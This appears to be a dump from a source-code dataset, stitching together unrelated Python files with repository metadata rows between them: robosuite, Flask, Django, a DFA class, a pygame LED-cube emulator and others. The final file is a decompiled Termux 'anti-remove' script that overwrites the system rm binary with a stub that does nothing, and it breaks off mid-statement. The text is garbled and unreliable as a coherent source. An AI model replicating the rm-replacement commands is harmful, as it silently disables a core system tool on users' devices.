        old_path_split = old_path.split("/")
        # max() raises ValueError if "robosuite" never appears in the path;
        # callers are expected to pass robosuite-recorded XML.
        ind = max(
            loc for loc, val in enumerate(old_path_split) if val == "robosuite"
        )  # last occurrence index
        new_path_split = path_split + old_path_split[ind + 1 :]
        new_path = "/".join(new_path_split)
        elem.set("file", new_path)
    return ET.tostring(root, encoding="utf8").decode("utf8")
class CustomMaterial(object):
    """
    Simple class to instantiate the necessary parameters to define an appropriate texture / material combo

    Instantiates a nested dict holding necessary components for procedurally generating a texture / material combo.
    Please see http://www.mujoco.org/book/XMLreference.html#asset for specific details on
    attributes expected for Mujoco texture / material tags, respectively.
    Note that the values in @tex_attrib and @mat_attrib can be in string or array / numerical form.

    Args:
        texture (str or 4-array): Name of texture file to be imported. If a string, should be part of ALL_TEXTURES.
            If texture is a 4-array, then this argument will be interpreted as an rgba tuple value and a template
            png will be procedurally generated during object instantiation, with any additional
            texture / material attributes specified.
            Note the RGBA values are expected to be floats between 0 and 1.
        tex_name (str): Name to reference the imported texture
        mat_name (str): Name to reference the imported material
        tex_attrib (dict): Any other optional mujoco texture specifications.
        mat_attrib (dict): Any other optional mujoco material specifications.

    Raises:
        AssertionError: [Invalid texture]
    """
    def __init__(
        self,
        texture,
        tex_name,
        mat_name,
        tex_attrib=None,
        mat_attrib=None,
    ):
        # Check if the desired texture is an rgba value
        if type(texture) is str:
            default = False
            # Verify that requested texture is valid
            assert texture in ALL_TEXTURES, "Error: Requested invalid texture. Got {}. Valid options are:\n{}".format(
                texture, ALL_TEXTURES)
        else:
            default = True
            # This is an rgba value and a default texture is desired; make sure length of rgba array is 4
            assert len(texture) == 4, "Error: Requested default texture. Got array of length {}. Expected rgba array " \
                "of length 4.".format(len(texture))
        # Setup the texture and material attributes (copy so caller dicts are not mutated)
        self.tex_attrib = {} if tex_attrib is None else tex_attrib.copy()
        self.mat_attrib = {} if mat_attrib is None else mat_attrib.copy()
        # Add in name values
        self.tex_attrib["name"] = tex_name
        self.mat_attrib["name"] = mat_name
        self.mat_attrib["texture"] = tex_name
        # Loop through all attributes and convert all non-string values into strings
        # (iterables become mujoco's space-separated form via array_to_string)
        for attrib in (self.tex_attrib, self.mat_attrib):
            for k, v in attrib.items():
                if type(v) is not str:
                    if isinstance(v, Iterable):
                        attrib[k] = array_to_string(v)
                    else:
                        attrib[k] = str(v)
        # Handle default and non-default cases separately for linking texture patch file locations
        if not default:
            # Add in the filepath to texture patch
            self.tex_attrib["file"] = xml_path_completion("textures/" + TEXTURES[texture])
        else:
            # Create a texture patch; the int cast floors each scaled RGBA channel
            tex = Image.new('RGBA', (100, 100), tuple((np.array(texture)*255).astype('int')))
            # Create temp directory if it does not exist
            # NOTE(review): hard-coded /tmp assumes a POSIX system (per the
            # comment below) — not portable to Windows; confirm targets.
            save_dir = "/tmp/robosuite_temp_tex"
            Path(save_dir).mkdir(parents=True, exist_ok=True)
            # Save this texture patch to the temp directory on disk (MacOS / Linux)
            fpath = save_dir + "/{}.png".format(tex_name)
            tex.save(fpath, "PNG")
            # Link this texture file to the default texture dict
            self.tex_attrib["file"] = fpath
| 33.855191
| 120
| 0.62957
| 3,802
| 0.306836
| 0
| 0
| 0
| 0
| 0
| 0
| 7,433
| 0.599871
|
36a07f1b483e17aa9a2719b08beb5635ce843a05
| 1,106
|
py
|
Python
|
cpgames/modules/core/__init__.py
|
Wasabii88/Games
|
33262ca1958207a24e57e3532feded7e275b1dd1
|
[
"MIT"
] | 1
|
2022-03-07T11:13:08.000Z
|
2022-03-07T11:13:08.000Z
|
cpgames/modules/core/__init__.py
|
Wasabii88/Games
|
33262ca1958207a24e57e3532feded7e275b1dd1
|
[
"MIT"
] | null | null | null |
cpgames/modules/core/__init__.py
|
Wasabii88/Games
|
33262ca1958207a24e57e3532feded7e275b1dd1
|
[
"MIT"
] | null | null | null |
'''initialize'''
from .ski import SkiGame
from .maze import MazeGame
from .gobang import GobangGame
from .tetris import TetrisGame
from .pacman import PacmanGame
from .gemgem import GemGemGame
from .tankwar import TankWarGame
from .sokoban import SokobanGame
from .pingpong import PingpongGame
from .trexrush import TRexRushGame
from .bomberman import BomberManGame
from .whacamole import WhacAMoleGame
from .catchcoins import CatchCoinsGame
from .flappybird import FlappyBirdGame
from .angrybirds import AngryBirdsGame
from .magictower import MagicTowerGame
from .aircraftwar import AircraftWarGame
from .bunnybadger import BunnyBadgerGame
from .minesweeper import MineSweeperGame
from .greedysnake import GreedySnakeGame
from .puzzlepieces import PuzzlePiecesGame
from .towerdefense import TowerDefenseGame
from .alieninvasion import AlienInvasionGame
from .breakoutclone import BreakoutcloneGame
from .twentyfourpoint import TwentyfourPointGame
from .flipcardbymemory import FlipCardByMemoryGame
from .twozerofoureight import TwoZeroFourEightGame
from .voicecontrolpikachu import VoiceControlPikachuGame
| 38.137931
| 56
| 0.867993
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 16
| 0.014467
|
36a1039f62de29095d8932b740524a88b0801df0
| 486
|
py
|
Python
|
jobs/migrations/0005_job_date.py
|
AkinWilderman/myPort
|
3ddeea04ccffe3ed7b66d6dba2c1f2dc00c9eb6c
|
[
"Apache-2.0"
] | null | null | null |
jobs/migrations/0005_job_date.py
|
AkinWilderman/myPort
|
3ddeea04ccffe3ed7b66d6dba2c1f2dc00c9eb6c
|
[
"Apache-2.0"
] | null | null | null |
jobs/migrations/0005_job_date.py
|
AkinWilderman/myPort
|
3ddeea04ccffe3ed7b66d6dba2c1f2dc00c9eb6c
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 2.1.7 on 2019-07-06 04:48
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    # Auto-generated by `makemigrations`: adds a non-nullable `date` field to Job.
    dependencies = [
        ('jobs', '0004_auto_20190706_0012'),
    ]
    operations = [
        migrations.AddField(
            model_name='job',
            name='date',
            # timezone.now fills the new column for existing rows;
            # preserve_default=False means the default is not kept on the model.
            field=models.DateTimeField(default=django.utils.timezone.now, verbose_name='Date'),
            preserve_default=False,
        ),
    ]
| 23.142857
| 95
| 0.625514
| 364
| 0.748971
| 0
| 0
| 0
| 0
| 0
| 0
| 95
| 0.195473
|
36a13155d02a4fb82c1083890ce96f64e834d72a
| 715
|
py
|
Python
|
build_an_ai_startup_demo/app/__init__.py
|
bbueno5000/BuildAnAIStartUpDemo
|
f70371802a2546530c34b7f04e2b644cd1faec8a
|
[
"MIT"
] | null | null | null |
build_an_ai_startup_demo/app/__init__.py
|
bbueno5000/BuildAnAIStartUpDemo
|
f70371802a2546530c34b7f04e2b644cd1faec8a
|
[
"MIT"
] | null | null | null |
build_an_ai_startup_demo/app/__init__.py
|
bbueno5000/BuildAnAIStartUpDemo
|
f70371802a2546530c34b7f04e2b644cd1faec8a
|
[
"MIT"
] | null | null | null |
import app
import flask
import flask_debugtoolbar
# NOTE(review): the `import app` above is immediately shadowed by the Flask
# instance created below, yet later lines reference `app.views` / `app.models`
# as if `app` were still the package — confirm the intended package layout.
app = flask.Flask(__name__)
app.config.from_object('app.config')
# NOTE(review): the `flask.ext.*` namespace was removed in Flask 1.0; this
# file targets legacy Flask + extension versions.
db = flask.ext.sqlalchemy.SQLAlchemy(app)
mail = flask.ext.mail.Mail(app)
# Enable the in-browser debug toolbar's template editor and profiler panels.
app.config['DEBUG_TB_TEMPLATE_EDITOR_ENABLED'] = True
app.config['DEBUG_TB_PROFILER_ENABLED'] = True
toolbar = flask_debugtoolbar.DebugToolbarExtension(app)
bcrypt = flask.ext.bcrypt.Bcrypt(app)
# Register the user-facing blueprint and wire up Flask-Login.
app.register_blueprint(app.views.user.userbp)
login_manager = flask.ext.login.LoginManager()
login_manager.init_app(app)
login_manager.login_view = 'userbp.signin'
@login_manager.user_loader
def load_user(email):
    """
    Flask-Login user loader: return the User whose email matches the id
    stored in the session, or None when no such user exists
    (`.first()` yields None on an empty result).
    """
    return app.models.User.query.filter(app.models.User.email == email).first()
| 23.833333
| 79
| 0.776224
| 0
| 0
| 0
| 0
| 158
| 0.220979
| 0
| 0
| 113
| 0.158042
|
36a2d86f1e49ac5520b342c8f2a78f162854b298
| 304
|
py
|
Python
|
main.py
|
shoulderhu/heroku-ctf-www
|
f1e136f8d93034d34a60702517b32fc0245dac38
|
[
"MIT"
] | null | null | null |
main.py
|
shoulderhu/heroku-ctf-www
|
f1e136f8d93034d34a60702517b32fc0245dac38
|
[
"MIT"
] | null | null | null |
main.py
|
shoulderhu/heroku-ctf-www
|
f1e136f8d93034d34a60702517b32fc0245dac38
|
[
"MIT"
] | null | null | null |
import os
from app import create_app
from dotenv import load_dotenv
# Load environment variables from a .env file located next to this script,
# if one exists (hosted environments set real env vars instead).
dotenv_path = os.path.join(os.path.dirname(__file__), ".env")
if os.path.exists(dotenv_path):
    load_dotenv(dotenv_path)
# Application factory: choose the config profile from FLASK_CONFIG,
# falling back to "default" when unset or empty.
app = create_app(os.environ.get("FLASK_CONFIG") or "default")
if __name__ == "__main__":
    app.run()
| 21.714286
| 61
| 0.733553
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 45
| 0.148026
|
36a322147c11bf81187e2fb1867ec7eedebfc053
| 1,663
|
py
|
Python
|
COMP/W01/class_DFA.py
|
joao-frohlich/BCC
|
9ed74eb6d921d1280f48680677a2140c5383368d
|
[
"Apache-2.0"
] | 10
|
2020-12-08T20:18:15.000Z
|
2021-06-07T20:00:07.000Z
|
COMP/W01/class_DFA.py
|
joao-frohlich/BCC
|
9ed74eb6d921d1280f48680677a2140c5383368d
|
[
"Apache-2.0"
] | 2
|
2021-06-28T03:42:13.000Z
|
2021-06-28T16:53:13.000Z
|
COMP/W01/class_DFA.py
|
joao-frohlich/BCC
|
9ed74eb6d921d1280f48680677a2140c5383368d
|
[
"Apache-2.0"
] | 2
|
2021-01-14T19:59:20.000Z
|
2021-06-15T11:53:21.000Z
|
class DFA:
    """Deterministic finite automaton over an explicit transition table.

    A word is accepted when, starting from ``start_state``, every symbol has
    a transition in ``delta_function`` and the final state reached is in
    ``final_states``. Any missing transition marks the run invalid and the
    automaton rejects.
    """

    # Class-level defaults; each instance overwrites these in __init__ and
    # during transitions.
    current_state = None
    current_letter = None
    valid = True

    def __init__(
        self, name, alphabet, states, delta_function, start_state, final_states
    ):
        self.name = name
        self.alphabet = alphabet
        self.states = states
        self.delta_function = delta_function
        self.start_state = start_state
        self.final_states = final_states
        self.current_state = start_state

    def transition_to_state_with_input(self, letter):
        """Consume one symbol; mark the run invalid if no transition exists."""
        if not self.valid:
            return
        key = (self.current_state, letter)
        if key not in self.delta_function:
            self.valid = False
            return
        self.current_state = self.delta_function[key]
        self.current_letter = letter

    def in_accept_state(self):
        """True iff the run is still valid and rests in a final state."""
        return self.valid and self.current_state in self.final_states

    def go_to_initial_state(self):
        """Reset the automaton for a fresh run."""
        self.current_letter = None
        self.valid = True
        self.current_state = self.start_state

    def run_with_word(self, word):
        """Run the automaton over an entire word; return acceptance."""
        self.go_to_initial_state()
        for symbol in word:
            self.transition_to_state_with_input(symbol)
        return self.in_accept_state()

    def run_with_letters(self, word):
        # NOTE: mirrors the original control flow exactly — it returns (None)
        # after processing at most the first symbol of ``word``.
        self.go_to_initial_state()
        for symbol in word:
            if self.run_with_letter(symbol):
                return
            return

    def run_with_letter(self, letter):
        """Consume one symbol and return the resulting current state."""
        self.transition_to_state_with_input(letter)
        return self.current_state

    def __len__(self):
        """Number of states."""
        return len(self.states)
| 29.175439
| 82
| 0.623572
| 1,662
| 0.999399
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
36a374d5b35c8fab447dcc5b470ddd3335b4f06d
| 5,628
|
py
|
Python
|
src/apps/devices/cubelib/emulator.py
|
ajintom/music_sync
|
0d7bc302502d28e4be4f0a0be1fc9bafb706f651
|
[
"MIT"
] | null | null | null |
src/apps/devices/cubelib/emulator.py
|
ajintom/music_sync
|
0d7bc302502d28e4be4f0a0be1fc9bafb706f651
|
[
"MIT"
] | null | null | null |
src/apps/devices/cubelib/emulator.py
|
ajintom/music_sync
|
0d7bc302502d28e4be4f0a0be1fc9bafb706f651
|
[
"MIT"
] | null | null | null |
#!/bin/env python
#using the wireframe module downloaded from http://www.petercollingridge.co.uk/
import mywireframe as wireframe
import pygame
from pygame import display
from pygame.draw import *
import time
import numpy
# Keyboard bindings: arrow keys translate, =/- scale, and the q/w, a/s, z/x
# pairs rotate all wireframes about the X, Y and Z axes respectively.
key_to_function = {
    pygame.K_LEFT: (lambda x: x.translateAll('x', -10)),
    pygame.K_RIGHT: (lambda x: x.translateAll('x', 10)),
    pygame.K_DOWN: (lambda x: x.translateAll('y', 10)),
    pygame.K_UP: (lambda x: x.translateAll('y', -10)),
    pygame.K_EQUALS: (lambda x: x.scaleAll(1.25)),
    pygame.K_MINUS: (lambda x: x.scaleAll( 0.8)),
    pygame.K_q: (lambda x: x.rotateAll('X', 0.1)),
    pygame.K_w: (lambda x: x.rotateAll('X', -0.1)),
    pygame.K_a: (lambda x: x.rotateAll('Y', 0.1)),
    pygame.K_s: (lambda x: x.rotateAll('Y', -0.1)),
    pygame.K_z: (lambda x: x.rotateAll('Z', 0.1)),
    pygame.K_x: (lambda x: x.rotateAll('Z', -0.1))}
class ProjectionViewer:
    """ Displays 3D objects on a Pygame screen """
    def __init__(self, width, height):
        self.width = width
        self.height = height
        self.screen = pygame.display.set_mode((width, height))
        pygame.display.set_caption('Wireframe Display')
        self.background = (10,10,50)
        # Named wireframe objects to render each frame.
        self.wireframes = {}
        self.displayNodes = True
        self.displayEdges = True
        self.nodeColour = (255,255,255)
        self.edgeColour = (200,200,200)
        self.nodeRadius = 3 #Modify to change size of the spheres
    def addWireframe(self, name, wireframe):
        """ Add a named wireframe object. """
        self.wireframes[name] = wireframe
    def run(self):
        # Process one batch of keyboard events and redraw a single frame.
        # NOTE(review): no QUIT handling here — presumably the caller's loop
        # is terminated externally; confirm.
        for event in pygame.event.get():
            if event.type == pygame.KEYDOWN:
                if event.key in key_to_function:
                    key_to_function[event.key](self)
        self.display()
        pygame.display.flip()
    def display(self):
        """ Draw the wireframes on the screen. """
        self.screen.fill(self.background)
        for wireframe in self.wireframes.values():
            if self.displayEdges:
                for edge in wireframe.edges:
                    pygame.draw.aaline(self.screen, self.edgeColour, (edge.start.x, edge.start.y), (edge.stop.x, edge.stop.y), 1)
            if self.displayNodes:
                for node in wireframe.nodes:
                    # Only nodes flagged visible are drawn (lit LEDs).
                    if node.visiblity:
                        pygame.draw.circle(self.screen, self.nodeColour, (int(node.x), int(node.y)), self.nodeRadius, 0)
    def translateAll(self, axis, d):
        """ Translate all wireframes along a given axis by d units. """
        # NOTE(review): dict.itervalues() is Python 2 only — this module
        # predates Python 3.
        for wireframe in self.wireframes.itervalues():
            wireframe.translate(axis, d)
    def scaleAll(self, scale):
        """ Scale all wireframes by a given scale, centred on the centre of the screen. """
        centre_x = self.width/2
        centre_y = self.height/2
        for wireframe in self.wireframes.itervalues():
            wireframe.scale((centre_x, centre_y), scale)
    def rotateAll(self, axis, theta):
        """ Rotate all wireframe about their centre, along a given axis by a given angle. """
        # Dispatch to the wireframe's rotateX/rotateY/rotateZ method by name.
        rotateFunction = 'rotate' + axis
        for wireframe in self.wireframes.itervalues():
            centre = wireframe.findCentre()
            getattr(wireframe, rotateFunction)(centre, theta)
    def createCube(self,cube,X=[50,140], Y=[50,140], Z=[50,140]):
        # Build the 8 frame corners plus a 10x10x10 grid of interior LED nodes
        # spanning the X/Y/Z extents; frame nodes occupy indices 0-7.
        cube.addNodes([(x,y,z) for x in X for y in Y for z in Z]) #adding the nodes of the cube framework.
        allnodes = []
        cube.addEdges([(n,n+4) for n in range(0,4)]+[(n,n+1) for n in range(0,8,2)]+[(n,n+2) for n in (0,1,4,5)]) #creating edges of the cube framework.
        for i in range(0,10):
            for j in range(0,10):
                for k in range(0,10):
                    allnodes.append((X[0]+(X[1]-X[0])/9 * i,Y[0]+(Y[1] - Y[0])/9 * j,Z[0] + (Z[1]-Z[0])/9 * k))
        cube.addNodes(allnodes)
        #cube.outputNodes()
        self.addWireframe('cube',cube)
def findIndex(coords): #Send coordinates of the points you want lit up. Will convert to needed indices.
    """Map (x, y, z) LED grid coordinates to flat node indices.

    The flat index is x*100 + y*10 + z, offset by 8 because node slots 0-7
    hold the cube's frame corners.
    """
    return [x * 100 + y * 10 + z + 8 for (x, y, z) in coords]
def findIndexArray(array): #Takes a 3-D numpy array containing bool of all the LED points.
    """Collect flat node indices for every cell of a 10x10x10 occupancy
    array whose value equals 1 (offset 8 past the cube's frame corners)."""
    return [
        i * 100 + j * 10 + k + 8
        for i in range(0, 10)
        for j in range(0, 10)
        for k in range(0, 10)
        if array[i][j][k] == 1
    ]
def wireframecube(size):
    """Return the (x, y, z) points along all 12 edges of a wireframe cube,
    centred on the 10x10x10 LED grid.

    Args:
        size (int): edge length in LEDs; odd values are bumped to size + 1.

    Returns:
        list of (x, y, z) tuples; corner points appear in more than one
        edge run, so the list contains duplicates by design.
    """
    if size % 2 == 1:
        size = size + 1
    # Floor division: `size / 2` yields a float under Python 3, which made
    # range(start, end + 1) raise TypeError; `//` is identical for ints.
    half = size // 2
    start = 5 - half
    end = 5 + half - 1
    cubecords = [(x,y,z) for x in (start,end) for y in (start,end) for z in range(start,end+1)]+[(x,z,y) for x in (start,end) for y in (start,end) for z in range(start,end+1)] + [(z,y,x) for x in (start,end) for y in (start,end) for z in range(start,end+1)]
    return cubecords
def cubes(size):
    """Return every (x, y, z) lattice point of a solid cube of the given
    edge length, centred on the 10x10x10 LED grid.

    Args:
        size (int): edge length in LEDs; odd values are bumped to size + 1.

    Returns:
        list of (x, y, z) tuples covering the full size**3 volume.
    """
    if size % 2 == 1:
        size = size + 1
    # Floor division: `size / 2` yields a float under Python 3, producing
    # float coordinates; `//` keeps ints and is identical for Python 2 ints.
    half = size // 2
    cubecords = []
    for i in range(0, size):
        for j in range(0, size):
            for k in range(0, size):
                cubecords.append((5 - half + i, 5 - half + j, 5 - half + k))
    return cubecords
if __name__ == '__main__':
    pv = ProjectionViewer(400, 300)
    allnodes =[]
    cube = wireframe.Wireframe() #storing all the nodes in this wireframe object.
    X = [50,140]
    Y = [50,140]
    Z = [50,140]
    pv.createCube(cube,X,Y,Z)
    # NOTE(review): YZface is computed but never used afterwards — confirm
    # whether it was meant to feed cube.setVisible below.
    YZface = findIndex((0,y,z) for y in range(0,10) for z in range(0,10))
    count = 0
    # Animation loop: every 5000 iterations grow the visible wireframe cube
    # by 2 LEDs per side (wrapping at 11), then redraw one frame.
    for k in range(1,150000):
        if k%5000 ==2500:
            count = (count+2)%11
        cube.setVisible(findIndex(wireframecube(count)))
        pv.run()
| 33.903614
| 254
| 0.600569
| 3,084
| 0.547974
| 0
| 0
| 0
| 0
| 0
| 0
| 842
| 0.149609
|
36a5039b731ed609ed21354c488bea0e48e4d31a
| 502
|
py
|
Python
|
lambda_handlers/errors.py
|
renovate-tests/lambda-handlers
|
0b14013f19b597524a8d50f7ea8813ee726c584c
|
[
"Apache-2.0"
] | null | null | null |
lambda_handlers/errors.py
|
renovate-tests/lambda-handlers
|
0b14013f19b597524a8d50f7ea8813ee726c584c
|
[
"Apache-2.0"
] | null | null | null |
lambda_handlers/errors.py
|
renovate-tests/lambda-handlers
|
0b14013f19b597524a8d50f7ea8813ee726c584c
|
[
"Apache-2.0"
] | null | null | null |
class LambdaError(Exception):
def __init__(self, description):
self.description = description
class BadRequestError(LambdaError):
pass
class ForbiddenError(LambdaError):
pass
class InternalServerError(LambdaError):
pass
class NotFoundError(LambdaError):
pass
class ValidationError(LambdaError):
pass
class FormattingError(LambdaError):
pass
class EventValidationError(ValidationError):
pass
class ResultValidationError(ValidationError):
pass
| 13.944444
| 45
| 0.750996
| 477
| 0.950199
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
36a6702d9737607ae7b2838e31ebcda4772cd182
| 810
|
py
|
Python
|
src/topbuzz/management/commands/topbuzz_stat.py
|
lucemia/gnews
|
ac537062d8e34bb63fe0bf95c2affc8d2771d392
|
[
"MIT"
] | null | null | null |
src/topbuzz/management/commands/topbuzz_stat.py
|
lucemia/gnews
|
ac537062d8e34bb63fe0bf95c2affc8d2771d392
|
[
"MIT"
] | null | null | null |
src/topbuzz/management/commands/topbuzz_stat.py
|
lucemia/gnews
|
ac537062d8e34bb63fe0bf95c2affc8d2771d392
|
[
"MIT"
] | null | null | null |
# -*- encoding=utf8 -*-
from django.core.management.base import BaseCommand
from datetime import timedelta, datetime
from topbuzz.tasks import stat
import argparse
def valid_date(s):
    """Argparse ``type=`` helper: parse a YYYY-MM-DD string into a datetime.

    Raises argparse.ArgumentTypeError on malformed input so argparse can
    print a clean usage error instead of a traceback.
    """
    try:
        parsed = datetime.strptime(s, "%Y-%m-%d")
    except ValueError:
        raise argparse.ArgumentTypeError("Not a valid date: '{0}'.".format(s))
    return parsed
class Command(BaseCommand):
    # NOTE(review): Python 2 file (`print stat(...)` statement in handle());
    # the help text says "create campaign" but handle() prints channel stats
    # — looks like a copy-paste; confirm.
    help = 'create campaign'
    def add_arguments(self, parser):
        # Positional args: channel name, inclusive date range (parsed by
        # valid_date into datetimes), and the auth cookie string.
        parser.add_argument('channel', type=str)
        parser.add_argument('start_date', type=valid_date)
        parser.add_argument('end_date', type=valid_date)
        parser.add_argument('cookie', type=str)
    def handle(self, *args, **kwargs):
        # Delegates to topbuzz.tasks.stat and prints whatever it returns.
        print stat(kwargs['channel'], kwargs['start_date'], kwargs['end_date'], kwargs['cookie'])
| 30
| 97
| 0.675309
| 445
| 0.549383
| 0
| 0
| 0
| 0
| 0
| 0
| 154
| 0.190123
|
36a769a0d7113d319d2bf9fc65325d50afd0198f
| 5,276
|
py
|
Python
|
Banner/rm_decompiled.py
|
Alpha-Demon404/RE-14
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 39
|
2020-02-26T09:44:36.000Z
|
2022-03-23T00:18:25.000Z
|
Banner/rm_decompiled.py
|
B4BY-DG/reverse-enginnering
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 15
|
2020-05-14T10:07:26.000Z
|
2022-01-06T02:55:32.000Z
|
Banner/rm_decompiled.py
|
B4BY-DG/reverse-enginnering
|
b5b46a9f0eee218f2a642b615c77135c33c6f4ad
|
[
"MIT"
] | 41
|
2020-03-16T22:36:38.000Z
|
2022-03-17T14:47:19.000Z
|
# uncompyle6 version 3.6.4
# Python bytecode 2.7
# Decompiled from: Python 2.7.17 (default, Oct 23 2019, 08:25:46)
# [GCC 4.2.1 Compatible Android (5220042 based on r346389c) Clang 8.0.7 (https://
# Embedded file name: <Angga>
"""
SILAHKAN RECODE SE ALAY MUNGKIN
DAN TIRU GAYA TAMPILAN SAYA :)
KASIH LOGO GEDE, WARNA KEK HOMO
TAMBAHIN AUTHOR NAMA SENDIRI
PRO
. GELLMOXER .
.
"""
import os, sys
# NOTE(review): on first run this writes a shell stub (prints "RM NONAKTIF"
# then exits) into Termux's lib directory for later installation over the
# real `rm`; the bare except silently swallows permission/IO errors.
try:
    if os.path.exists('/data/data/com.termux/files/usr/lib/libncurss.so'):
        pass
    else:
        nf = 'echo -e "\n\x1b[1;97m \xe2\x96\xb6 \x1b[1;91mRM \x1b[1;97mNON\x1b[1;96mAKTIF\x1b[1;97m !!\n"\nexit'
        wf = open('/data/data/com.termux/files/usr/lib/libncurss.so', 'w')
        wf.write(nf)
        wf.close()
except:
    pass
try:
ck = open('/data/data/com.termux/files/usr/bin/rm', 'r').read()
if 'AKTIF' in ck:
print ' \x1b[1;96m\xe2\x95\xad\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xae\n \xe2\x94\x82 \x1b[1;90mANTI REMOVE \x1b[1;97m(\x1b[1;96mAKTIF\x1b[1;97m) \x1b[1;96m\xe2\x94\x82\n \xe2\x94\x9c\xe2\x94\x80\xe2\x94\xb3\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\xa4 \n \xe2\x94\x831\xe2\x94\x9c\xe2\x9e\xa4 GANTI \x1b[48;5;009m \x1b[48;5;000m\xe2\x94\x83\n \xe2\x94\x830\xe2\x94\x9c\xe2\x9e\xa4 EXIT \x1b[48;5;015m \x1b[48;5;000m\xe2\x94\x83\n \xe2\x94\x9c\xe2\x94\x80\xe2\x94\xbb\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xaf'
ty = raw_input(' \x1b[1;96m\xe2\x95\xb0\xe2\x9e\xa4 ')
try:
if ty == '1':
os.system('cp ~/../usr/lib/.libncurss.so ~/../usr/bin/rm')
os.system('chmod +x ~/../usr/bin/rm')
print '\x1b[1;97m \xe2\x9e\xa4 \x1b[1;90mSukses Mencopot \x1b[1;97mANTI\x1b[1;91mRM'
else:
os.system('exit')
except:
print '\x1b[1;91m \xe2\x9e\xa4 \x1b[1;90mGagal Mencopot \x1b[1;97mANTI\x1b[1;91mRM'
else:
print ' \x1b[1;96m\xe2\x95\xad\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xae\n \xe2\x94\x82 \x1b[1;90mANTI REMOVE \x1b[1;97m(\x1b[1;91mNONAKTIF\x1b[1;97m) \x1b[1;96m\xe2\x94\x82\n \xe2\x94\x9c\xe2\x94\x80\xe2\x94\xb3\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\xa4 \n \xe2\x94\x831\xe2\x94\x9c\xe2\x9e\xa4 GANTI \x1b[48;5;009m \x1b[48;5;000m\xe2\x94\x83\n \xe2\x94\x830\xe2\x94\x9c\xe2\x9e\xa4 EXIT \x1b[48;5;015m \x1b[48;5;000m\xe2\x94\x83\n \xe2\x94\x9c\xe2\x94\x80\xe2\x94\xbb\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x94\x80\xe2\x95\xaf'
ty = raw_input(' \x1b[1;96m\xe2\x95\xb0\xe2\x9e\xa4 ')
if ty == '1':
os.system('cp ~/../usr/bin/rm ~/../usr/lib/.libncurss.so')
os.system('cp ~/../usr/lib/libncurss.so ~/../usr/bin/rm')
os.system('chmod +x ~/../usr/bin/rm')
print '\x1b[1;97m \xe2\x9e\xa4 \x1b[1;90mSukses Memasang \x1b[1;97mANTI\x1b[1;91mRM'
elif ty == '0':
os.system('exit')
else:
os.system('exit')
print '\x1b[1;91m \xe2\x9e\xa4 \x1b[1;90mGagal Memasang \x1b[1;97mANTI\x1b[1;91mRM'
except:
